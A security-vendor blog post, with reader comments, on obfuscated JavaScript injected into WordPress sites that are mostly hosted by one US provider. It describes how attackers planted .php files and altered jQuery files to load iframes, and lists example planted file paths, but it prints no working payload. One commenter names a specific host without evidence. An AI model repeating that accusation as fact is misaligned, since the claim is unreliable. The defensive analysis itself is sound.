Large US hosting provider hit in web attack

Filed Under: Malware, SophosLabs

Over the past few weeks, we have been seeing a whole mix of legitimate web sites serving up a specific malicious JavaScript. When innocent users browse these sites, the injected JavaScript adds an iframe element to the page in order to load further malicious content from a remote site.

As you can see, the injected scripts are polymorphic and heavily obfuscated, one of the common tricks used by hackers in an attempt to evade detection. Regardless of the obfuscation, Sophos products generically block the malicious scripts as Mal/JSIfrLd-A.

Looking at a number of the affected sites, it was quickly apparent that they shared a common link - they all seemed to be running WordPress. Ahah, the root cause? After all, WordPress injection attacks are pretty commonplace, and something all site admins should be aware of.

In typical WordPress injection attacks, the database ends up "peppered" with malicious HTML (typically an iframe or script element to load other remote content) such that the web pages users view when browsing the site contain that malicious code. In this latest attack however, things are a little more complex.

Firstly, one or more files containing malicious JavaScript are added to the site, within an existing folder using a .php filename, for example:

.../wp-content/plugins/wp-polls/tinymce/plugins/polls/langs/mm_menu.php
.../wp-includes/js/tinymce/plugins/media/AC_OETags.js.php
.../wp-content/uploads/2010/02/bigballs.php
.../games/IE7.php
.../wp-includes/js/tinymce/plugins/fullscreen/mod_jw_sir.php
.../es/wp-includes/js/tinymce/plugins/directionality/md5-min.php

Then a legitimate JavaScript file that is already used by the site is modified to include a call to the above file(s). For example, the hacked jQuery script found on one of the victim sites is shown below. You can see the malicious code that has been added to the beginning of the file, which will attempt to load five malicious scripts that have been added to the site.

So, is WordPress really the relevant link between the affected sites? Or is that just coincidence? Earlier today I queried all of the sites that we have seen hit in this attack over the past 7 days, identifying almost 600. When looking at the GeoIP data for these sites I found that 97% of them were hosted by the same provider! Couple this with the fact that several different WordPress versions are being used by the affected sites (including the latest version in some cases) and I think the finger of blame should perhaps be pointing somewhere other than WordPress.

Digging further, it would appear that the hosting provider in question is no stranger to site hacks, as official posts on their company blog testify. In such cases it is imperative that in addition to cleaning up affected sites, the target of the attack is identified (be it a vulnerable server, web application or otherwise). Only then can any vulnerabilities or insecurities be closed, to prevent future similar attacks.

As a footnote, whilst security may not be your top priority when choosing a hosting provider, it should be pretty high up the list. Assume that all servers, sites and web applications will be attacked. Assume that some of these attacks will succeed. What you want to know is how your provider will respond - from clean up to hardening against future attacks.

, , , , , ,

You might like

9 Responses to Large US hosting provider hit in web attack

  1. Pics (or in this case, names/details) or it didn't happen.

    • fraserhoward · 1372 days ago

      Well, it is not about naming and shaming the hosting provider in such situations. First thing is to get the problem resolved and sites cleaned up - we are making contact with them to achieve this. As I touched on in the post, of more interest is how rapidly providers are able to respond to an attack.

      • pbinbellv · 1371 days ago

        How about alerting the people who might be unknowing customers of this hosting provider? It seems like you're choosing to protect the reputation (really?) of this provider over the security of your readers. I'm an admirer of your articles but I have to say this one is of no use unless you post the name of the hosting provider responsible.

        My opinion anyway.

        • chpster · 1368 days ago

          Ditto, I agree with pbinbellv. I am a customer of a couple of different hosting companies, I'd like to know if any of my sites are at risk.

  2. Brandon · 1372 days ago

    Most of these providers are in the business to make money, not because they love giving others a platform to express themselves. Furthermore, I doubt most hosting providers disclose these sorts of breaches to their subscribers.

    I understand we want to give these providers the benefit of the doubt but if their reputation isn't at stake, it's likely their revenue isn't either. Therefore, if it doesn't impact business, why increase operating costs?

  3. G79 · 1371 days ago

    It will be 1&1 Internet, the world's worst web host.

    One of our customers, who choose to host with 1&1 for their cheapness, woke up after the weekend to find out that their site had been hijacked with an image embedded on their site stating just that!.

    No one should host a site with a web host who clearly does not take security seriously, and any host who has compromised site's due to the lack of adequate security measure should be penalized, plain and simple.

    In today's world of automation there's absolutley no excuse for not patching web servers!

  4. From what I've seen, most cases are due to outdated versions of software (over 70% in fact).

    In this specific case, I'd be willing to bet the vector had something to do with directory traversal in multi-domain accounts, and/or FTP user issues.

    This is most likely how it started spreading, and then used outdated, known to be exploited versions of WordPress (& other software) to exploit, infect, and reinfect.

    • G79 · 1356 days ago

      That maybe true dremeda, but that leaves around 30% that could be due to inadequate security measures and lack of or slow distribution of server software updates!

      Web hosts should be locking down FTP accounts by default an forcing users to have to unlock to upload by ip address or time slots only.

      • Harbinger · 867 days ago

        G79 while that may be true, people who get into web hosting should have a more advanced idea of what they're doing. Locking the FTP accounts isn't hard to do and most people don't even know FTP or IP from the other. Most often they'll just do as instructed, which is why the onus is on us to help propagate security and to enforce what we see as valid security measures.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

About the author

Fraser is one of the Principal Virus Researchers in SophosLabs. He has been working for Sophos since 2006, and his main interest is in web related threats.